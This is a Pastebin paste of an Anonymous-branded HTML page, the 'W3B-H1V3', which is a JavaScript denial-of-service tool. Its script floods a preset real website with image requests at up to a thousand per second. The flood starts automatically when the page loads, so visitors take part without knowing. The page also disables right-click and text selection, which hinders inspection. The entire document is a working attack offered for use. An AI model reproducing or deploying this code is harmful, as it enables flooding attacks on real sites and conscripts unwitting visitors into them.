Advertisement
Guest User

lol

a guest
Sep 21st, 2014
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.01 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. <title>[#OpTurkey] -- [Anonops Anonimo]</title>
  6. <style type="text/css">
  7. body {
  8. background: url("http://dl.dropbox.com/u/29637731/H4X0R3D/background.png");
  9. background-repeat: repeat;
  10. background-position: right;
  11. background-attachment: fixed;
  12. margin-top: 5%;
  13. margin-bottom: 5%;
  14. margin-left: 15%;
  15. margin-right: 15%;
  16. font-family:"Courier New", Courier, monospace;
  17. color: #808080;
  18. }
  19. fieldset {
  20. border-style: none;
  21. margin: 10px;
  22. }
  23. p {
  24. margin: 0;
  25. }
  26. input {
  27. margin: 0;
  28. background-color: transparent;
  29. border: none;
  30. text-align: center;
  31. font-family:"Courier New", Courier, monospace;
  32. color: #808080;
  33. }
  34. </style>
  35. <script language="JavaScript">
  36. <!-- Disable
  37. function disableselect(e){
  38. return false
  39. }
  40. function reEnable(){
  41. return true
  42. }
  43. //if IE4+
  44. document.onselectstart=new Function ("return false")
  45. document.oncontextmenu=new Function ("return false")
  46. //if NS6
  47. if (window.sidebar){
  48. document.onmousedown=disableselect
  49. document.onclick=reEnable
  50. }
  51. //-->
  52. </script>
  53. </head>
  54. <body onLoad="type()">
  55. <fieldset>
  56. <div id="title" align="center"><font size="+3" color="#FF0000">[#</font><font size="+3">OpMegaupload</font><font size="+3" color="#FF0000">] -- [</font><font size="+3">W3B-H1V3</font><font size="+3" color="#FF0000">]</font></div><br><br>
  57.  
  58. <div id="hive" align="center">
  59. <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
  60. <input name="target" id="target" size="100" value="http://chitika.com/"><br><br>
  61. <font color="#FF0000">[</font>REQUESTS<font color="#FF0000">]</font><br>
  62. <input id="requests" size="100" value="1000"><br><br>
  63. <font color="#FF0000">[</font>MESSAGE<font color="#FF0000">]</font><br>
  64. <input id="message" size="100" value="Government, Expect us.!"><br><br>
  65. <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
  66.  
  67. REQUESTS <p id="requested">0</p>
  68. SUCCEDED <p id="succeeded">0</p>
  69. FAILED <p id="failed">0</p><br>
  70. <button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);"> STOP! </button><br><br><br>
  71. </div>
  72. <script>
  73. (function () {
  74. var fireInterval;
  75. var isFiring = false;
  76. var currentTime = new Date();
  77. var lastSuccess = currentTime.getTime();
  78.  
  79. var requestedNode = document.getElementById("requested"),
  80. succeededNode = document.getElementById("succeeded"),
  81. failedNode = document.getElementById("failed"),
  82. targetNode = document.getElementById("target"),
  83. fire = document.getElementById("fire"),
  84. messageNode = document.getElementById("message"),
  85. requestsNode = document.getElementById("requests"),
  86. timeoutNode = document.getElementById("timeout");
  87.  
  88. var target = targetNode.value;
  89. targetNode.onchange = function () {
  90. target = this.value;
  91. };
  92.  
  93. var requestsHT = {};
  94.  
  95. var requested = 0,
  96. succeeded = 0,
  97. failed = 0;
  98.  
  99. var makeHttpRequest = function () {
  100. if ( (currentTime.getTime()-lastSuccess) > 10000) {
  101. return;
  102. } else {
  103. lastSuccess = currentTime.getTime();
  104. };
  105.  
  106. var rID =Number(new Date());
  107.  
  108. var img = new Image();
  109. img.onerror = function () { onFail(rID); };
  110. img.onabort = function () { onFail(rID); };
  111. img.onload = function () { onSuccess(rID); };
  112. img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
  113. requestsHT[rID] = img;
  114. onRequest(rID);
  115. };
  116.  
  117. var onRequest = function (rID) {
  118. requested++;
  119. requestedNode.innerHTML = requested;
  120. };
  121.  
  122. var onComplete = function (rID) {
  123. delete requestsHT[rID];
  124. };
  125.  
  126. var onFail = function (rID) {
  127. // failedCtr++;
  128. //failedCtrNode.innerHTML = failedCtr;
  129. succeeded++; //Seems like the url will always fail it it isn't an image
  130. succeededNode.innerHTML = succeeded;
  131. delete requestsHT[rID];
  132. };
  133.  
  134. var onSuccess = function (rID) {
  135. succeeded++;
  136. succeededNode.innerHTML = succeeded;
  137. delete requestsHT[rID];
  138. };
  139.  
  140. fire.onclick = function () {
  141. if (isFiring) {
  142. clearInterval(fireInterval);
  143. isFiring = false;
  144. this.innerHTML = "FIRE!";
  145. } else {
  146. isFiring = true;
  147. this.innerHTML = "STOP!";
  148. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  149. }
  150. };
  151.  
  152. function start() {
  153. if (isFiring) {
  154. clearInterval(fireInterval);
  155. isFiring = false;
  156. this.innerHTML = "FIRE!";
  157. } else {
  158. isFiring = true;
  159. this.innerHTML = "STOP";
  160. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  161. }
  162. };
  163. document.getElementById("target").value = "http://chitika.com/";
  164. start();
  165. })();
  166. </script>
  167. <div id="footer" align="center"><font color="#FF0000"># [</font>Anonops Anonimo<font color="#FF0000">] -- [</font>ANONYMOUS<font color="#FF0000">] #</font></div>
  168.  
  169. </fieldset>
  170. </body>
  171. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement